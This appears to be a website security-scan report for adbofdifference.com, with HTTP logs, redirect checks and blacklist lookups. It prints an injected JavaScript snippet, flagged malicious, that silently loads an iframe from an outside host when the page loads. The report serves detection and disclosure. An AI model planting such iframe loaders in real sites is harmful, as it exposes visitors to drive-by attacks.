Scanned pages/files
Request | Server response | Status |
http://adbofdifference.com/ | 200 OK Content-Length: 5053 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var id = '195'; var u09 = document.createElement('iframe'); u09.src = 'http://www.torsdagsherrer.skjern-net.dk/dtd.php'; u09.style.position = 'absolute'; u09.style.border = '1'; u09.style.height = '31px'; u09.style.width = '42px'; u09.style.left = '500px'; u09.style.top = '100px'; if (!document.getElementById('u')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'u\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('u').appendChild(u09); }})(); Antivirus reports:
| ||
http://adbofdifference.com/UPLOADS/Long%20Format%20Reel.mp4 | 200 OK Content-Length: 300873 Content-Type: video/mp4 | clean |
http://adbofdifference.com/test404page.js | 404 Not Found Content-Length: 419 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adbofdifference.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 00:08:12 GMT
Accept-Ranges: bytes
ETag: "13bd-4d6499ce43200"
Server: Apache
Vary: Accept-Encoding
Content-Length: 5053
Content-Type: text/html
Last-Modified: Fri, 22 Feb 2013 05:39:20 GMT
...5053 bytes of data.
GET / HTTP/1.1
Host: adbofdifference.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 00:08:12 GMT
Accept-Ranges: bytes
ETag: "13bd-4d6499ce43200"
Server: Apache
Vary: Accept-Encoding
Content-Length: 5053
Content-Type: text/html
Last-Modified: Fri, 22 Feb 2013 05:39:20 GMT
...5053 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: adbofdifference.com
Referer: http://www.google.com/search?q=adbofdifference.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: adbofdifference.com
Referer: http://www.google.com/search?q=adbofdifference.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adbofdifference.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adbofdifference.com/
Result: adbofdifference.com is not infected or malware details are not published yet.
Result: adbofdifference.com is not infected or malware details are not published yet.